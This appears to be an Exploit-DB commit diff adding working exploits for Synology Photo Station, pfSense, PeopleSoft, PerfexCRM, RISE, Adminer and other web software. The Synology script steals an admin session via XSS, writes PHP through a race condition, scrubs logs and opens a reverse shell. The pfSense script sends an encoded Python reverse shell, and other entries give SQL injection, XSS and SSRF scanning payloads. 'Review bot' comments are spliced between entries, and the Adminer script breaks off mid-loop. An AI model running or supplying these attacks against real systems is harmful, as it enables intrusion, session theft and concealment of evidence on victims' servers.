Linux/SuperH (sh4) - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (132 bytes)
Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes)
Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)
Linux/x86-64 - shutdown -h now Shellcode (65 bytes)
Linux/x86-64 - shutdown -h now Shellcode (64 bytes)
Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) Polymorphic Shellcode (273 bytes)

Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)
Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)
Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)
Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)

Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)
Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)
Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)
Linux x86 - execve /bin/sh Shellcode (24 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)
Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)
Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)
Linux/x86 - execve /bin/sh Shellcode (24 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)
Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)
Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)
Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes)
Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes)
Offensive Security 2018-01-16 05:02:18 +00:00
parent f589361686
commit 50c008ba06
41 changed files with 3781 additions and 145 deletions

304
exploits/hardware/remote/43609.py Executable file

@ -0,0 +1,304 @@
#!/usr/local/bin/python
"""
Synology Photo Station <= 6.8.2-3461 (latest) SYNOPHOTO_Flickr_MultiUpload Race Condition File Write Remote Code Execution Vulnerability
Found by: mr_me
Tested: 6.8.2-3461 (latest at the time)
Vendor Advisory: https://www.synology.com/en-global/support/security/Synology_SA_18_02
# Summary:
==========
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Synology Photo Station. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.
The specific flaw exists within the SYNOPHOTO_Flickr_MultiUpload function. When parsing the prog_id parameter, the process does not properly validate a user-supplied string before using it to execute a call to file_put_contents. An attacker can leverage this vulnerability to execute code under the context of the PhotoStation user.
# Example:
==========
saturn:synology mr_me$ ./sinology.py 192.168.100.9 en0
Synology Photo Station SYNOPHOTO_Flickr_MultiUpload Race Condition File Write Remote Code Execution Vulnerability
mr_me
(+) waiting for the admin...
(+) stolen: qt4obchbqfss2ap9ct9nb1i534
(+) updated the settings!
(+) wrote php code!
(+) attempting race condition...
(+) won the race!
(+) rce is proven!
(+) deleted the image and scrubbed the logs!
(+) starting handler on port 4444
(+) connection from 192.168.100.9
(+) pop thy shell!
id
uid=138862(PhotoStation) gid=138862(PhotoStation) groups=138862(PhotoStation)
"""
import sys
import socket
import requests
import telnetlib
from threading import Thread
from base64 import b64encode as b64e
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
try:
import netifaces as ni
except:
print "(-) try 'pip install netifaces'"
sys.exit(1)
# haven't pwned yet
pwned = False
class xss(BaseHTTPRequestHandler):
def log_message(self, format, *args):
return
def do_GET(self):
global s
# incase the referer isn't set, its coming from someone else
try:
referer = self.headers.get('Referer')
except:
referer = ""
# of course this isn't bullet proof, but its enough for a poc
if t in referer:
if "PHPSESSID" in self.path:
s = self.path.split("=")[1]
print "(+) stolen: %s" % s
pwned = True
self.send_response(200)
self.end_headers()
return
def _build_bd(raw=False):
php = "<?php file_put_contents('si.php','<?php eval(base64_decode($_SERVER[HTTP_SIN]));');die('done'); ?>.gif"
if raw == True:
return php
return "photo_2f_%s" % (php.encode("hex"))
def we_can_set_settings(target, session):
uri = "http://%s/photo/admin/share_setting.php" % target
d = {
"action" : "set_setting",
"social_flickr" : "on",
"share_upload_orig" : "on"
}
c = { "PHPSESSID" : session }
r = requests.post(uri, data=d, cookies=c).json()
if "success" in r:
if r["success"] == True:
return True
return False
def we_can_upload(target, session):
uri = "http://%s/photo/webapi/file.php" % (target)
p = { "SynoToken" : session }
c = { "PHPSESSID" : session }
# valid gif, important
gif = "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x00"
gif += "\x00\x00\x21\xf9\x04\x01\x00\x00\x00\x00\x2c"
gif += "\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02"
f = { "original": ("si.gif", gif) }
d = {
"api": "SYNO.PhotoStation.File",
"method" : "uploadphoto",
"version" : 1,
"dest_folder_path": "",
"duplicate" : "rename",
"mtime": "1513540164787",
"filename" : _build_bd(True)
}
r = requests.post(uri, params=p, files=f, cookies=c, data=d).json()
if "success" in r:
if r["success"] == True:
return True
return False
def race(target):
r = ""
while("done" not in r):
r = requests.get("http://%s/photo/pwn.php" % target).text
return True
def we_won_race(target, session, racing_thread):
while(racing_thread.isAlive()):
uri = "http://%s/photo/SocialNetwork/flickr.php" % target
d = {
"prog_id" : "../../volume1/@appstore/PhotoStation/photo/pwn.php",
"action" : "multi_upload",
"token" : 1,
"secret" : "",
"photoList" : _build_bd()
}
c = { "PHPSESSID": session }
requests.post(uri, cookies=c, data=d)
return True
def build_php_code():
phpkode = ("""
@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);""")
phpkode += ("""$dis=@ini_get('disable_functions');""")
phpkode += ("""if(!empty($dis)){$dis=preg_replace('/[, ]+/', ',', $dis);$dis=explode(',', $dis);""")
phpkode += ("""$dis=array_map('trim', $dis);}else{$dis=array();} """)
phpkode += ("""if(!function_exists('LcNIcoB')){function LcNIcoB($c){ """)
phpkode += ("""global $dis;if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {$c=$c." 2>&1\\n";} """)
phpkode += ("""$imARhD='is_callable';$kqqI='in_array';""")
phpkode += ("""if($imARhD('popen')and!$kqqI('popen',$dis)){$fp=popen($c,'r');""")
phpkode += ("""$o=NULL;if(is_resource($fp)){while(!feof($fp)){ """)
phpkode += ("""$o.=fread($fp,1024);}}@pclose($fp);}else""")
phpkode += ("""if($imARhD('proc_open')and!$kqqI('proc_open',$dis)){ """)
phpkode += ("""$handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); """)
phpkode += ("""$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} """)
phpkode += ("""@proc_close($handle);}else if($imARhD('system')and!$kqqI('system',$dis)){ """)
phpkode += ("""ob_start();system($c);$o=ob_get_contents();ob_end_clean(); """)
phpkode += ("""}else if($imARhD('passthru')and!$kqqI('passthru',$dis)){ob_start();passthru($c); """)
phpkode += ("""$o=ob_get_contents();ob_end_clean(); """)
phpkode += ("""}else if($imARhD('shell_exec')and!$kqqI('shell_exec',$dis)){ """)
phpkode += ("""$o=shell_exec($c);}else if($imARhD('exec')and!$kqqI('exec',$dis)){ """)
phpkode += ("""$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} """)
phpkode += ("""$nofuncs='no exec functions'; """)
phpkode += ("""if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ """)
phpkode += ("""$s=@fsockopen('tcp://%s','%d');while($c=fread($s,2048)){$out = ''; """ % (cb_host, cb_port))
phpkode += ("""if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
phpkode += ("""}elseif (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit'){break;}else{ """)
phpkode += ("""$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); """)
phpkode += ("""break;}}fwrite($s,$out);}fclose($s);}else{ """)
phpkode += ("""$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,'%s','%d'); """ % (cb_host, cb_port))
phpkode += ("""@socket_write($s,"socket_create");while($c=@socket_read($s,2048)){ """)
phpkode += ("""$out = '';if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
phpkode += ("""} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { """)
phpkode += ("""break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ """)
phpkode += ("""@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); """)
phpkode += ("""}@socket_close($s);} """)
return phpkode
def exec_code(target):
handlerthr = Thread(target=handler, args=(cb_port,))
handlerthr.start()
we_can_exec_php(target, b64e(build_php_code()))
def handler(lport):
print "(+) starting handler on port %d" % lport
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lport))
s.listen(1)
conn, addr = s.accept()
print "(+) connection from %s" % addr[0]
t.sock = conn
print "(+) pop thy shell!"
t.interact()
def we_can_exec_php(target, php):
h = { "SIN" : php }
r = requests.get("http://%s/photo/si.php" % target, headers=h)
if r.text == "pwn":
return True
return False
def we_can_clean_up(target, session):
uri = "http://%s/photo/webapi/photo.php" % target
d = {
"api": "SYNO.PhotoStation.Photo",
"method" : "delete",
"version" : 1,
"id" : _build_bd()
}
c = { "PHPSESSID" : session }
h = { "X-SYNO-TOKEN" : session }
r = requests.post(uri, cookies=c, data=d, headers=h).json()
if "success" in r:
if r["success"] == True:
return True
return False
def banner():
return """\n\tSynology Photo Station SYNOPHOTO_Flickr_MultiUpload Race Condition File Write Remote Code Execution Vulnerability\n\tmr_me\n"""
def do_xss(target, ip):
j = "\"><img src=x onerror=this.src=\"http://%s:9090/?\"+document.cookie>" % ip
d = {
"api" : "SYNO.PhotoStation.Auth",
"method" : "login",
"version" : 1,
"username" : j,
"password" : "WAT",
"enable_syno_token" : "true"
}
r = requests.post("http://%s/photo/webapi/auth.php" % target, data=d).json()
def we_can_clear_logs(target, session):
c = { "PHPSESSID" : session }
p = { "SynoToken" : session }
d = {
"api": "SYNO.PhotoStation.PhotoLog",
"method" : "clear",
"version" : 1,
}
r = requests.post("http://%s/photo/webapi/log.php" % target, data=d, params=p, cookies=c).json()
if "success" in r:
if r["success"] == True:
return True
return False
def start_pain_train(t, s):
if we_can_set_settings(t, s):
print "(+) updated the settings!"
if we_can_upload(t, s):
print "(+) wrote php code!"
print "(+) attempting race condition..."
r = Thread(target=race, args=(t,))
r.start()
if we_won_race(t, s, r):
print "(+) won the race!"
if we_can_exec_php(t, b64e('`rm pwn.php`;echo "pwn";')):
print "(+) rce is proven!"
if we_can_clean_up(t, s) and we_can_clear_logs(t, s):
print "(+) deleted the image and scrubbed the logs!"
exec_code(t)
def keep_running():
if pwned == True:
return False
return True
def main():
print banner()
global cb_host, cb_port, s, t
if len(sys.argv) != 3:
print "(+) usage: %s <target> <interface>" % sys.argv[0]
print "(+) eg: %s 192.168.100.9 en0" % sys.argv[0]
sys.exit(1)
s = ""
t = sys.argv[1]
cb_port = 4444
try:
cb_host = ni.ifaddresses(sys.argv[2])[2][0]['addr']
except:
print "(-) no ip address associated with that interface!"
sys.exit(1)
do_xss(t, cb_host)
try:
server = HTTPServer(('0.0.0.0', 9090), xss)
print '(+) waiting for the admin...'
while keep_running():
server.handle_request()
except KeyboardInterrupt:
print '(+) shutting down the web server'
server.socket.close()
if s != "":
start_pain_train(t, s)
if __name__ == "__main__":
main()


@ -0,0 +1,57 @@
# Exploit Title: RCE vulnerability in monitor service of PeopleSoft 8.54, 8.55, 8.56
# Date: 30 Oct 2017
# Exploit Author: Vahagn Vardanyan
# Vendor Homepage: Oracle
# Software Link: Oracle PeopleSoft
# Version: 8.54, 8.55, 8.56
# Tested on: Windows, Linux
# CVE : CVE-2017-10366 https://github.com/vah13/OracleCVE/tree/master/CVE-2017-10366
The RCE vulnerability present in monitor service of PeopleSoft 8.54, 8.55, 8.56.
POST /monitor/%SITE_NAME% HTTP/1.1
Host: PeopleSoft:PORT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0)
Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie:a=aa
§JAVA_SERIAL§
%SITE_NAME% - is a PeopleSoft "name" to get it you can use some information
disclosure or brute force. information for automation detection:
1. If monitor component deployed and you don't know %SITE_NAME% then
will get this type of error
<h2>Site name is not valid. Check your URL syntax and try again.</h2>
1. If %SITE_NAME% is true then you will get this message
PeopleSoft
Ping Test for Monitor Servlet
Ping successful. Site %SITE_NAME% is valid.
1. If monitor don't deployed then you will get this message
Error 404--Not Found
From RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1:
10.4.5 404 Not Found
The server has not found anything matching the Request-URI. No
indication is given of whether the condition is temporary or
permanent.
If the server does not wish to make this information available to the
client, the status code 403 (Forbidden) can be used instead. The 410
(Gone) status code SHOULD be used if the server knows, through some
internally configurable mechanism, that an old resource is permanently
unavailable and has no forwarding address.
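Review bot: The three response cases at the end are each numbered `1.`, and the entry never says what `§JAVA_SERIAL§` stands for or how the issue is remediated, so it is hard to use for checking one's own deployment. Number the cases 1 to 3 and add a short line naming the vulnerability class (presumably deserialization of a Java object posted to the monitor servlet; confirm against the linked repository). A closing line such as `Fix: apply the vendor patch for CVE-2017-10366 and do not expose /monitor/ to untrusted networks` would give defenders the action to take alongside the three fingerprint responses.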


@ -0,0 +1,21 @@
# Exploit Title: Oracle E-Business suite Open Redirect
# Google Dork: inurl:OA_HTML/cabo/
# Date: April 2017
# Exploit Author: [author]
# Vendor Homepage: http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
# Software Link: [download link if available]
# Version: Oracle E-Business Suite (REQUIRED)
# Tested on: [relevant os]
# CVE : CVE-2017-3528
The exploit can be leveraged for an open redirect using the following
exploit path:
https://targetsite/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=/\example.com
Oracle E-Business suite is vulnerable to an open redirect issue,
specifically the redirect parameter allows any domain to be supplied
and it will be rendered on the target's site.
Note I was also credited for this CVE, see the Oracle
CPU(http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html)
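Review bot: The header still contains unfilled template fields (`[author]`, `[download link if available]`, `[relevant os]` and `# Version: Oracle E-Business Suite (REQUIRED)`), so the entry itself does not say which releases are affected. The commit's own title for this entry lists 12.1.3/12.2.x, which belongs in the `# Version:` line. The body links the April 2017 CPU twice without stating that applying it is the remediation; a line such as `Fix: apply Oracle CPU April 2017 (CVE-2017-3528)` would make that explicit.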

110
exploits/php/webapps/43560.py Executable file

@ -0,0 +1,110 @@
#!/usr/bin/env python3
# Exploit Title: pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
# Date: 2018-01-12
# Exploit Author: absolomb
# Vendor Homepage: https://www.pfsense.org/
# Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/
# Version: <=2.1.3
# Tested on: FreeBSD 8.3-RELEASE-p16
# CVE : CVE-2014-4688
import argparse
import requests
import urllib
import urllib3
import collections
'''
pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
This script will return a reverse shell on specified listener address and port.
Ensure you have started a listener to catch the shell before running!
'''
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Remote Host")
parser.add_argument('--lhost', help = 'Local Host listener')
parser.add_argument('--lport', help = 'Local Port listener')
parser.add_argument("--username", help = "pfsense Username")
parser.add_argument("--password", help = "pfsense Password")
args = parser.parse_args()
rhost = args.rhost
lhost = args.lhost
lport = args.lport
username = args.username
password = args.password
# command to be converted into octal
command = """
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("%s",%s));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'
""" % (lhost, lport)
payload = ""
# encode payload in octal
for char in command:
payload += ("\\" + oct(ord(char)).lstrip("0o"))
login_url = 'https://' + rhost + '/index.php'
exploit_url = "https://" + rhost + "/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh"
headers = [
('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'),
('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
('Accept-Language', 'en-US,en;q=0.5'),
('Referer',login_url),
('Connection', 'close'),
('Upgrade-Insecure-Requests', '1'),
('Content-Type', 'application/x-www-form-urlencoded')
]
# probably not necessary but did it anyways
headers = collections.OrderedDict(headers)
# Disable insecure https connection warning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
client = requests.session()
# try to get the login page and grab the csrf token
try:
login_page = client.get(login_url, verify=False)
index = login_page.text.find("csrfMagicToken")
csrf_token = login_page.text[index:index+128].split('"')[-1]
except:
print("Could not connect to host!")
exit()
# format login variables and data
if csrf_token:
print("CSRF token obtained")
login_data = [('__csrf_magic',csrf_token), ('usernamefld',username), ('passwordfld',password), ('login','Login') ]
login_data = collections.OrderedDict(login_data)
encoded_data = urllib.parse.urlencode(login_data)
# POST login request with data, cookies and header
login_request = client.post(login_url, data=encoded_data, cookies=client.cookies, headers=headers)
else:
print("No CSRF token!")
exit()
if login_request.status_code == 200:
print("Running exploit...")
# make GET request to vulnerable url with payload. Probably a better way to do this but if the request times out then most likely you have caught the shell
try:
exploit_request = client.get(exploit_url, cookies=client.cookies, headers=headers, timeout=5)
if exploit_request.status_code:
print("Error running exploit")
except:
print("Exploit completed")
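Review bot: The header comment records the CVE and the affected versions but not the fixed release or what the request looks like in a log, so the file cannot be used to confirm a patched system or to write a detection rule. After the `# CVE : CVE-2014-4688` line I would add `# Fixed in: pfSense 2.1.4 (upgrading is the remediation)` and `# Log indicator: status_rrd_graph_img.php requests whose database= value contains ';' or '|'`, both of which follow from how `exploit_url` is built. The docstring should also state that the login POST sends `--password` over a session opened with `verify=False` and with the TLS warning suppressed, so the admin credential goes to whatever host answers on `rhost`. Taking the password on the command line also leaves it in shell history and the process list; `getpass.getpass()` avoids that.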


@ -0,0 +1,28 @@
# Exploit Title: ImgHosting Image Storage System 1.5 - Cross-Site-Scripting
# Date: 12-01-2018
# Exploit Author: Dennis Veninga
# Contact Author: d.veninga [at] networking4all.com
# Vendor Homepage: foxsash.com
# Version: 1.5
# CVE-ID: CVE-2018-5479
ImgHosting Image Storage System quick and easy image hosting without
registration. Service is ideal for fast and reliable placement of images
for forums, blogs and websites. Simple design, comfortable customers,
direct links to pictures. This hosting service that we do every day use.
Like thousands of other people. We do service to the people.
ImgHosting 1.5 (According footer information) is vulnerable to XSS attacks.
The affected function is its search engine. Since there is an user/admin
login interface, it's possible for attackers to steal sessions of users and
thus admin(s). By sending users an infected URL, code will be executed.
---------------------------
---------------------------
PoC:
http://{TARGET}/?search="><script>confirm(document.domain)<%2Fscript>
---------------------------
---------------------------
Evil javascript code can be inserted and will be executed when visiting the link


@ -0,0 +1,44 @@
# # # # #
# Exploit Title: Domains & Hostings Manager PRO v 3.0 - Authentication Bypass
# Date: 13.01.2018
# Vendor Homepage: http://endavi.com/
# Software Buy: https://codecanyon.net/item/advanced-domains-and-hostings-pro-v3-multiuser/10368735
# Demo: http://endavi.com/dhrpro_demo/
# Version: 3.0
# Tested on: Windows 10
# # # # #
# Exploit Author: Tauco
Description :
While most applications require authentication to gain access to private information or to execute tasks, not every authentication method is able to provide adequate security. Negligence, ignorance, or simple understatement of security threats often result in authentication schemes that can be bypassed by simply skipping the log in page and directly calling an internal page that is supposed to be accessed only after authentication has been performed.
In addition, it is often possible to bypass authentication measures by tampering with requests and tricking the application into thinking that the user is already authenticated. This can be accomplished either by modifying the given URL parameter, by manipulating the form, or by counterfeiting sessions.
POC
===================================================================================================
POST /dhrpro_demo/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
accusername=admin%27+or+%271%27%3D%271&accuserpassword=admin%27+or+%271%27%3D%271&login=+ENTER+
Login = admin' or '1'='1
Password = admin' or '1'='1
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST & GET
Vulnerable Product: [+] Domains & Hostings Manager PRO v 3.0
Vulnerable Parameter(s): [+] accusername, accuserpassword
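Review bot: The title and the two description paragraphs describe a generic authentication bypass (forced browsing, session tampering), but the request shown is a SQL injection in the `accusername` and `accuserpassword` fields of `login.php`; the entry should name that class so it is triaged and fixed correctly. I would replace the boilerplate description with one line such as `Description: SQL injection in the login form (accusername, accuserpassword) allows login without valid credentials` and add `Fix: use parameterized queries for the login lookup`. The `Request Method(s): POST & GET` line is not supported by the PoC, which shows only a POST.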


@ -0,0 +1,62 @@
# Exploit Title: PerfexCRM 1.9.7 Unrestricted php5 File upload
# Exploit Author: Ahmad Mahfouz
# Description: PerfexCRM 1.9.7 prone to unrestricted file upload that lead to system take over by misconfigured elfinder plugin
# Contact: http://twitter.com/eln1x
# Date: 12/01/2018
# CVE: CVE-2017-17976
# Version: v1.9.7
# Software Link: https://www.perfexcrm.com/
# bypassing the misconfigured file upload with file .php5
GET admin/utilities/elfinder_init?cmd=mkfile&name=shell.php5&target=[dir]
JSON Response:
{"added":[{"isowner":false,"mime":"text\/plain","read":1,"write":1,"size":"0","hash":"[XXX]","name":"shell.php5","phash":"[XXXX] "}],"changed":[{"isowner":false,"mime":"directory","read":1,"write":1,"size":0,"hash":"[ XXX]","name":"asa","phash":"[ XXX] ","volumeid":"[XXX]"}]}
#bypass the file content restriction by adding TEXT line to represent mime type text
Request
POST /admin/utilities/elfinder_init HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close
cmd=put&target=[folder]&encoding=UTF-8&content=demo
newline to represent text mime type
<?php
phpinfo();
?>
HTTP/1.1 200 OK
Content-Type: application/json
Connection: close
Content-Length: 167
{"changed":[{"isowner":false,"mime":"text\/plain","read":1,"write":1,"size":"44","hash":"[XXX]","name":"shell.php5","phash":"[XXX]]"}]}


@ -0,0 +1,24 @@
# Exploit Title: RISE Ultimate Project Manager 1.9 - SQL Injection
# Exploit Author: Ahmad Mahfouz
# Contact: http://twitter.com/eln1x
# Date: 30/12/2017
# CVE: CVE-2017-17999
# Vendor Homepage: http://fairsketch.com/
# Version: 1.9
POST /index.php/knowledge_base/get_article_suggestion/ HTTP/1.1
Host: localhost
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 14
Connection: close
search=product'%20and%20(select*from(select(sleep(20)))a)--%20

430
exploits/php/webapps/43593.py Executable file

@ -0,0 +1,430 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ADMINER-UNAUTHENTICATED-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: apparition security
Vendor:
==============
www.adminer.org
Product:
================
Adminer <= v4.3.1
Adminer (formerly phpMinAdmin) is a full-featured database management tool written in PHP. Conversely to phpMyAdmin, it consist of a
single file ready to deploy to the target server. Adminer is available for MySQL, PostgreSQL, SQLite, MS SQL, Oracle, Firebird, SimpleDB, Elasticsearch and MongoDB.
https://github.com/vrana/adminer/releases/
Vulnerability Type:
===================
Server Side Request Forgery
CVE Reference:
==============
N/A
Security Issue:
================
Adminer allows unauthenticated connections to be initiated to arbitrary systems/ports. This vulnerability can be used to potentially bypass firewalls to
identify internal hosts and perform port scanning of other servers for reconnaissance purposes. Funny thing is Adminer throttles invalid login attempts
but allows endless unauthorized HTTP connections to other systems as long as your not trying to authenticate to Adminer itself.
Situations where Adminer can talk to a server that we are not allowed to (ACL) and where we can talk to the server hosting Adminer, it can do recon for us.
Recently in LAN I was firewalled off from a server, however another server running Adminer I can talk to. Also, that Adminer server can talk to the target.
Since Adminer suffers from Server-Side Request Forgery, I can scan for open ports and gather information from that firewalled off protected server.
This allowed me to not only bypass the ACL but also hide from the threat detection system (IDS) monitoring east west connections.
However, sysadmins who check the logs on the server hosting Adminer application will see our port scans.
root@lamp log/apache2# cat other_vhosts_access.log
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:25:11 +0000] "GET ///?server=TARGET-IP:21&username= HTTP/1.1" 403 1429 "-" "-"
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:24 +0000] "GET ///?server=TARGET-IP:22&username= HTTP/1.1" 403 6019 "-" "-"
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:56 +0000] "GET ///?server=TARGET-IP:23&username= HTTP/1.1" 403 6021 "-" "-"
Details:
==================
By comparing different failed error responses from Adminer when making SSRF bogus connections, I figured out which ports are open/closed.
Port open ==> Lost connection to MySQL server at 'reading initial communication packet
Port open ==> MySQL server has gone away
Port open ==> Bad file descriptor
Port closed ==> Can't connect to MySQL server on '<TARGET-IP>';
Port closed ==> No connection could be made because the target machine actively refused it
Port closed ==> A connection attempt failed.
This worked so well for me I wrote a quick port scanner 'PortMiner' as a proof of concept that leverages Adminer SSRF vulnerability.
PortMiner observations:
======================
No response 'read operation timed out' means the port is possibly open or filtered and should be given a closer look if possible. This seems to occur when scanning
Web server ports like 80, 443. However, when we get error responses like the ones above from the server we can be fairly certain a port is either open/closed.
Quick POC:
echo -e 'HTTP/1.1 200 OK\r\n\r\n' | nc -l -p 5555
Use range 5555-5555
Exploit/POC:
=============
import socket,re,ssl,warnings,subprocess,time
from platform import system as system_name
from os import system as system_call
#Adminer Server Side Request Forgery
#PortMiner Scanner Tool
#by John Page (hyp3rlinx)
#ISR: ApparitionSec
#hyp3rlinx.altervista.org
#=========================
#D1rty0Tis says hi.
#timeout
MAX_TIME=32
#ports to log
port_lst=[]
#Web server response often times out but usually means ports open.
false_pos_ports=['80','443']
BANNER='''
____ _ __ __ _
| _ \ | | | \/ (_)
| |__) |__ _ __| |_| \ / |_ _ __ ___ _ __
| ___/ _ \| '__| __| |\/| | | '_ \ / _ \ '__|
| | | (_) | | | |_| | | | | | | | __/ |
|_| \___/|_| \__|_| |_|_|_| |_|\___|_|
'''
def info():
print "\nPortMiner depends on Error messages to determine open/closed ports."
print "Read operations reported 'timed out' may be open/filtered.\n"
def greet():
print 'Adminer Unauthenticated SSRF Port Scanner Tool'
print 'Targets Adminer used for MySQL administration\n'
print 'by hyp3rlinx - apparition security'
print '-----------------------------------------------------\n'
print 'Scan small ranges or single ports or expect to wait.\n'
print 'Do not scan networks without authorized permission.'
print 'Author not responsible for abuse/misuse.\n'
def chk_ports(p):
p=p.replace('-',',')
port_arg=p.split(',')
try:
if len(port_arg)>1:
if int(port_arg[1]) < int(port_arg[0]):
print 'Port range not valid.'
raw_input()
return
if int(port_arg[1])>65535:
print 'Exceeded max Port range 65535.'
raw_input()
return
except Exception as e:
print str(e)
return None
return list(range(int(port_arg[0]),int(port_arg[1])+1))
def log(IP):
try:
file=open('PortMiner.txt', 'w')
file.write(IP+'\n')
for p in port_lst:
file.write(p+'\n')
file.close()
except Exception as e:
print str(e)
print "\nSee PortMiner.txt"
def use_ssl(ADMINER,ADMINER_PORT):
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ADMINER,int(ADMINER_PORT)))
s=ssl.wrap_socket(s, keyfile=None, certfile=None, server_side=False, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_SSLv23)
s.close()
except Exception as e:
print ""
return False
return True
def version(ip,port,uri,use_ssl):
res=""
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,int(port)))
if use_ssl:
s=ssl.wrap_socket(s, keyfile=None, certfile=None, server_side=False, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_SSLv23)
s.send('GET '+'/'+uri+'/?server='+':'+'&username=\r\n\r\n')
except Exception as e:
print 'Host up but cant connect.' #str(e)
print 'Re-check Host/Port/URI.'
s.close()
return 504
while True:
RES=s.recv(512)
if RES.find('Forbidden')!=-1:
print 'Forbidden 403'
